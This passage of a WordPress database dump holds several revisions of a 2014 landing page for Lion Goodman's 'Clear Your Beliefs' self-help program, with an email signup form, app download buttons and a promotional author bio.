(1430, 4194, '2014-09-21 15:31:27', '2014-09-21 20:31:27', '	<div id="main">\r\n\r\n    	<div id="logo"><img src="images/logo.png" width="650px" height="141px" /></div>\r\n\r\n        <div id="banner">\r\n        	<img style="margin: 0px; cursor: pointer;" onClick="javascript:showvideo();" src="images/banner-new.jpg" width="562px" height="292px" />\r\n         </div>\r\n\r\n        <div id="three_steps">\r\n\r\n\r\n        	<div class="step1">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>Clear Your Beliefs eBOOK</h1>\r\n\r\n                <h2>DOWNLOAD YOUR FREE<BR />\r\n\r\n                eBOOK</h2>\r\n\r\n                    <div id="step1_button"><div id="mc_embed_signup" style="width: 240px; margin-left:9px;">\r\n\r\n<form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<table border="0" cellpadding="2" cellspacing="3"><tr><td class="frmtext">\r\n\r\n<b>First Name</b></td><td><input id="mce-FNAME" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="FNAME" /></td></tr></div>\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<tr><td class="frmtext">\r\n\r\n<b>Email</b></td><td><input id="mce-EMAIL" class="required email" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="EMAIL" border="1px solid #8C1014" /></td></tr></table></div>\r\n\r\n<input type="image" src="images/get_access.png" name="Submit" value="Submit" style="padding-top:10px;" onClick="formsubmit();"></form></div></div>\r\n\r\n</div>\r\n\r\n\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step2">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>iClearIt APP</h1>\r\n\r\n                    <div id="mindmaster_img"><img src="images/mindmaster.png"  width="86px" height="86px" /></div>\r\n\r\n                    <h2>DOWNLOAD THE <BR />\r\n\r\n                	iClearIt APP</h2>\r\n\r\n                    <div id="button">\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" width="224px" height="52px" /></a></div>\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png"  width="224px" height="52px" /></a></div>\r\n\r\n                    </div>\r\n\r\n					</div>\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step3">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>CLEAR YOUR BELIEFS</h1>\r\n\r\n                    <div id="step3_img"><img src="images/step3_img.png" width="201px" height="161px" /></div>\r\n\r\n                    <h2>Choose a Goal & <BR />\r\n\r\n                	Master Your Chosen Life</h2>\r\n\r\n                    <div class="step3_buttons"><a href=""><img src="images/step3_button.png" width="204px" height="62px" /></a></div>\r\n\r\n            </div>\r\n\r\n			</div>\r\n\r\n			</div>\r\n		<div id="textarea">\r\n		<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish \r\nwith \r\nClear Your Beliefs </h3>\r\n<ul>\r\n<li>Release hurt and pain from the past\r\n</li><li>\r\nClear resistance to taking action\r\n</li><li>\r\nOpen to new possibilities\r\n</li><li>\r\nEliminate blocks to manifestation\r\n</li><li>\r\nFind your true purpose\r\n</li><li>\r\nDelete what’s been holding you back\r\n</li><li>\r\nChange your personality style\r\n</li><li>\r\nOpen to deeper, more profound love\r\n</li><li>\r\nRecognize your spiritual nature\r\n</li><li>\r\nBecome less reactive, more calm\r\n</li><li>\r\nRediscover the source of your personal power\r\n</li></ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<h3>How and Why It Works</h3>\r\n\r\n<ul>\r\n<li>Beliefs are the major cause of upset and unhappiness\r\n\r\nCYB clears beliefs at the core of the psyche, where they live \r\n</li><li>\r\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\r\n</li><li>\r\nYou take charge and decide what you want to believe\r\n</li><li>\r\nYou’re guided gently, step-by-step, through the entire process \r\n</li><li>\r\nYou decide how far to go, and what changes to make\r\n</li></ul>\r\n</div>\r\n</div>\r\n         <div style="clear:both"></div>           	                    \r\n<div>\r\n<p>I’m Lion Goodman, creator of the Clear Your Beliefs program.  I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen  modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.  \r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the Clear Your Beliefs program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away – like magic.  And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="">\r\n</p>\r\n</div>                    \r\n                                \r\n            </div>\r\n        \r\n        <div style="clear:both"></div>\r\n       <div class="bott_heading">Are you ready to master your mind?</div>\r\n       <div id="bottom_buttons">\r\n       	<div class="bott_button"><a href=""><img src="images/bott_button.png" width="250px" height="66px" /></a></div>\r\n        <div id="bott_or">OR</div>\r\n        <div class="bott_button"><a href="http://www.drseansullivan.com"><img src="images/bott_button1.png" width="250px" height="66px"  /></a></div>\r\n       \r\n       </div>\r\n	   \r\n	       \r\n    </div>\r\n', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:31:27', '2014-09-21 20:31:27', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1432, 4194, '2014-09-21 15:36:31', '2014-09-21 20:36:31', '	<div id="main">\r\n\r\n    	<div id="logo"><img src="images/logo.png" width="650px" height="141px" /></div>\r\n\r\n        <div id="banner">\r\n        	<img style="margin: 0px; cursor: pointer;" onClick="javascript:showvideo();" src="images/banner-new.jpg" width="562px" height="292px" />\r\n         </div>\r\n\r\n        <div id="three_steps">\r\n\r\n\r\n        	<div class="step1">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>Clear Your Beliefs eBOOK</h1>\r\n\r\n                <h2>DOWNLOAD YOUR FREE<BR />\r\n\r\n                eBOOK</h2>\r\n\r\n                    <div id="step1_button"><div id="mc_embed_signup" style="width: 240px; margin-left:9px;">\r\n\r\n<form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<table border="0" cellpadding="2" cellspacing="3"><tr><td class="frmtext">\r\n\r\n<b>First Name</b></td><td><input id="mce-FNAME" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="FNAME" /></td></tr></div>\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<tr><td class="frmtext">\r\n\r\n<b>Email</b></td><td><input id="mce-EMAIL" class="required email" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="EMAIL" border="1px solid #8C1014" /></td></tr></table></div>\r\n\r\n<input type="image" src="images/get_access.png" name="Submit" value="Submit" style="padding-top:10px;" onClick="formsubmit();"></form></div></div>\r\n\r\n</div>\r\n\r\n\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step2">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>iClearIt APP</h1>\r\n\r\n                    <div id="mindmaster_img"><img src="images/mindmaster.png"  width="86px" height="86px" /></div>\r\n\r\n                    <h2>DOWNLOAD THE <BR />\r\n\r\n                	iClearIt APP</h2>\r\n\r\n                    <div id="button">\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" width="224px" height="52px" /></a></div>\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png"  width="224px" height="52px" /></a></div>\r\n\r\n                    </div>\r\n\r\n					</div>\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step3">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>CLEAR YOUR BELIEFS</h1>\r\n\r\n                    <div id="step3_img"><img src="images/step3_img.png" width="201px" height="161px" /></div>\r\n\r\n                    <h2>Choose a Goal & <BR />\r\n\r\n                	Master Your Chosen Life</h2>\r\n\r\n                    <div class="step3_buttons"><a href=""><img src="images/step3_button.png" width="204px" height="62px" /></a></div>\r\n\r\n            </div>\r\n\r\n			</div>\r\n\r\n			</div>\r\n		<div id="textarea">\r\n		<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish \r\nwith \r\nClear Your Beliefs </h3>\r\n<ul>\r\n<li>Release hurt and pain from the past\r\n</li><li>\r\nClear resistance to taking action\r\n</li><li>\r\nOpen to new possibilities\r\n</li><li>\r\nEliminate blocks to manifestation\r\n</li><li>\r\nFind your true purpose\r\n</li><li>\r\nDelete what’s been holding you back\r\n</li><li>\r\nChange your personality style\r\n</li><li>\r\nOpen to deeper, more profound love\r\n</li><li>\r\nRecognize your spiritual nature\r\n</li><li>\r\nBecome less reactive, more calm\r\n</li><li>\r\nRediscover the source of your personal power\r\n</li></ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<h3>How and Why It Works</h3>\r\n\r\n<ul>\r\n<li>Beliefs are the major cause of upset and unhappiness\r\n\r\nCYB clears beliefs at the core of the psyche, where they live \r\n</li><li>\r\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\r\n</li><li>\r\nYou take charge and decide what you want to believe\r\n</li><li>\r\nYou’re guided gently, step-by-step, through the entire process \r\n</li><li>\r\nYou decide how far to go, and what changes to make\r\n</li></ul>\r\n</div>\r\n</div>\r\n         <div style="clear:both"></div>  \r\n<img src="images/lion.jpg" alt="" />         	                    \r\n<div>\r\n<p>I’m Lion Goodman, creator of the Clear Your Beliefs program.  I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen  modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.  \r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the Clear Your Beliefs program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away – like magic.  And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="">\r\n</p>\r\n</div>                    \r\n                                \r\n            </div>\r\n        \r\n        <div style="clear:both"></div>\r\n       <div class="bott_heading">\r\n<h3>Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\r\n\r\n<p>Bring the Clear Your Beliefs process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\r\n</div>\r\n       <div id="bottom_buttons">\r\n       	<div class="bott_button"><a href=""><img src="images/bott_button.png" width="250px" height="66px" /></a></div>\r\n       \r\n       </div>\r\n	   \r\n	       \r\n    </div>\r\n', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:36:31', '2014-09-21 20:36:31', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1431, 4194, '2014-09-21 15:34:15', '2014-09-21 20:34:15', '	<div id="main">\r\n\r\n    	<div id="logo"><img src="images/logo.png" width="650px" height="141px" /></div>\r\n\r\n        <div id="banner">\r\n        	<img style="margin: 0px; cursor: pointer;" onClick="javascript:showvideo();" src="images/banner-new.jpg" width="562px" height="292px" />\r\n         </div>\r\n\r\n        <div id="three_steps">\r\n\r\n\r\n        	<div class="step1">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>Clear Your Beliefs eBOOK</h1>\r\n\r\n                <h2>DOWNLOAD YOUR FREE<BR />\r\n\r\n                eBOOK</h2>\r\n\r\n                    <div id="step1_button"><div id="mc_embed_signup" style="width: 240px; margin-left:9px;">\r\n\r\n<form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<table border="0" cellpadding="2" cellspacing="3"><tr><td class="frmtext">\r\n\r\n<b>First Name</b></td><td><input id="mce-FNAME" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="FNAME" /></td></tr></div>\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<tr><td class="frmtext">\r\n\r\n<b>Email</b></td><td><input id="mce-EMAIL" class="required email" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="EMAIL" border="1px solid #8C1014" /></td></tr></table></div>\r\n\r\n<input type="image" src="images/get_access.png" name="Submit" value="Submit" style="padding-top:10px;" onClick="formsubmit();"></form></div></div>\r\n\r\n</div>\r\n\r\n\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step2">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>iClearIt APP</h1>\r\n\r\n                    <div id="mindmaster_img"><img src="images/mindmaster.png"  width="86px" height="86px" /></div>\r\n\r\n                    <h2>DOWNLOAD THE <BR />\r\n\r\n                	iClearIt APP</h2>\r\n\r\n                    <div id="button">\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" width="224px" height="52px" /></a></div>\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png"  width="224px" height="52px" /></a></div>\r\n\r\n                    </div>\r\n\r\n					</div>\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step3">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>CLEAR YOUR BELIEFS</h1>\r\n\r\n                    <div id="step3_img"><img src="images/step3_img.png" width="201px" height="161px" /></div>\r\n\r\n                    <h2>Choose a Goal & <BR />\r\n\r\n                	Master Your Chosen Life</h2>\r\n\r\n                    <div class="step3_buttons"><a href=""><img src="images/step3_button.png" width="204px" height="62px" /></a></div>\r\n\r\n            </div>\r\n\r\n			</div>\r\n\r\n			</div>\r\n		<div id="textarea">\r\n		<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish \r\nwith \r\nClear Your Beliefs </h3>\r\n<ul>\r\n<li>Release hurt and pain from the past\r\n</li><li>\r\nClear resistance to taking action\r\n</li><li>\r\nOpen to new possibilities\r\n</li><li>\r\nEliminate blocks to manifestation\r\n</li><li>\r\nFind your true purpose\r\n</li><li>\r\nDelete what’s been holding you back\r\n</li><li>\r\nChange your personality style\r\n</li><li>\r\nOpen to deeper, more profound love\r\n</li><li>\r\nRecognize your spiritual nature\r\n</li><li>\r\nBecome less reactive, more calm\r\n</li><li>\r\nRediscover the source of your personal power\r\n</li></ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<h3>How and Why It Works</h3>\r\n\r\n<ul>\r\n<li>Beliefs are the major cause of upset and unhappiness\r\n\r\nCYB clears beliefs at the core of the psyche, where they live \r\n</li><li>\r\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\r\n</li><li>\r\nYou take charge and decide what you want to believe\r\n</li><li>\r\nYou’re guided gently, step-by-step, through the entire process \r\n</li><li>\r\nYou decide how far to go, and what changes to make\r\n</li></ul>\r\n</div>\r\n</div>\r\n         <div style="clear:both"></div>           	                    \r\n<div>\r\n<p>I’m Lion Goodman, creator of the Clear Your Beliefs program.  I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen  modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.  \r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the Clear Your Beliefs program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away – like magic.  And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="">\r\n</p>\r\n</div>                    \r\n                                \r\n            </div>\r\n        \r\n        <div style="clear:both"></div>\r\n       <div class="bott_heading">\r\n<h3>Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\r\n\r\n<p>Bring the Clear Your Beliefs process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\r\n</div>\r\n       <div id="bottom_buttons">\r\n       	<div class="bott_button"><a href=""><img src="images/bott_button.png" width="250px" height="66px" /></a></div>\r\n       \r\n       </div>\r\n	   \r\n	       \r\n    </div>\r\n', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:34:15', '2014-09-21 20:34:15', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1433, 4194, '2014-09-21 15:39:09', '2014-09-21 20:39:09', '', 'lion', '', 'inherit', 'closed', 'open', '', 'lion-2', '', '', '2014-09-21 15:39:09', '2014-09-21 20:39:09', '', 1421, 'http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion.jpg', 0, 'attachment', 'image/jpeg', 0),
(1435, 4194, '2014-09-21 15:42:02', '2014-09-21 20:42:02', '<div id="main">\r\n<div id="logo"><img src="images/logo.png" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD YOUR FREE</h2>\r\neBOOK\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="0" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" /></div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<div id="mindmaster_img"><img src="images/mindmaster.png" alt="" width="86px" height="86px" /></div>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<h3>How and Why It Works</h3>\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a><img class="aligncenter" src="images/bott_button.png" alt="" width="250px" height="66px" /></a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:42:02', '2014-09-21 20:42:02', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1434, 4194, '2014-09-21 15:40:26', '2014-09-21 20:40:26', '	<div id="main">\r\n\r\n    	<div id="logo"><img src="images/logo.png" width="650px" height="141px" /></div>\r\n\r\n        <div id="banner">\r\n        	<img style="margin: 0px; cursor: pointer;" onClick="javascript:showvideo();" src="images/banner-new.jpg" width="562px" height="292px" />\r\n         </div>\r\n\r\n        <div id="three_steps">\r\n\r\n\r\n        	<div class="step1">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>Clear Your Beliefs eBOOK</h1>\r\n\r\n                <h2>DOWNLOAD YOUR FREE<BR />\r\n\r\n                eBOOK</h2>\r\n\r\n                    <div id="step1_button"><div id="mc_embed_signup" style="width: 240px; margin-left:9px;">\r\n\r\n<form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<table border="0" cellpadding="2" cellspacing="3"><tr><td class="frmtext">\r\n\r\n<b>First Name</b></td><td><input id="mce-FNAME" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="FNAME" /></td></tr></div>\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<tr><td class="frmtext">\r\n\r\n<b>Email</b></td><td><input id="mce-EMAIL" class="required email" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="EMAIL" border="1px solid #8C1014" /></td></tr></table></div>\r\n\r\n<input type="image" src="images/get_access.png" name="Submit" value="Submit" style="padding-top:10px;" onClick="formsubmit();"></form></div></div>\r\n\r\n</div>\r\n\r\n\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step2">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>iClearIt APP</h1>\r\n\r\n                    <div id="mindmaster_img"><img src="images/mindmaster.png"  width="86px" height="86px" /></div>\r\n\r\n                    <h2>DOWNLOAD THE <BR />\r\n\r\n                	iClearIt APP</h2>\r\n\r\n                    <div id="button">\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" width="224px" height="52px" /></a></div>\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png"  width="224px" height="52px" /></a></div>\r\n\r\n                    </div>\r\n\r\n					</div>\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step3">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>CLEAR YOUR BELIEFS</h1>\r\n\r\n                    <div id="step3_img"><img src="images/step3_img.png" width="201px" height="161px" /></div>\r\n\r\n                    <h2>Choose a Goal & <BR />\r\n\r\n                	Master Your Chosen Life</h2>\r\n\r\n                    <div class="step3_buttons"><a href=""><img src="images/step3_button.png" width="204px" height="62px" /></a></div>\r\n\r\n            </div>\r\n\r\n			</div>\r\n\r\n			</div>\r\n		<div id="textarea">\r\n		<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish \r\nwith \r\nClear Your Beliefs </h3>\r\n<ul>\r\n<li>Release hurt and pain from the past\r\n</li><li>\r\nClear resistance to taking action\r\n</li><li>\r\nOpen to new possibilities\r\n</li><li>\r\nEliminate blocks to manifestation\r\n</li><li>\r\nFind your true purpose\r\n</li><li>\r\nDelete what’s been holding you back\r\n</li><li>\r\nChange your personality style\r\n</li><li>\r\nOpen to deeper, more profound love\r\n</li><li>\r\nRecognize your spiritual nature\r\n</li><li>\r\nBecome less reactive, more calm\r\n</li><li>\r\nRediscover the source of your personal power\r\n</li></ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<h3>How and Why It Works</h3>\r\n\r\n<ul>\r\n<li>Beliefs are the major cause of upset and unhappiness\r\n\r\nCYB clears beliefs at the core of the psyche, where they live \r\n</li><li>\r\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\r\n</li><li>\r\nYou take charge and decide what you want to believe\r\n</li><li>\r\nYou’re guided gently, step-by-step, through the entire process \r\n</li><li>\r\nYou decide how far to go, and what changes to make\r\n</li></ul>\r\n</div>\r\n</div>\r\n         <div 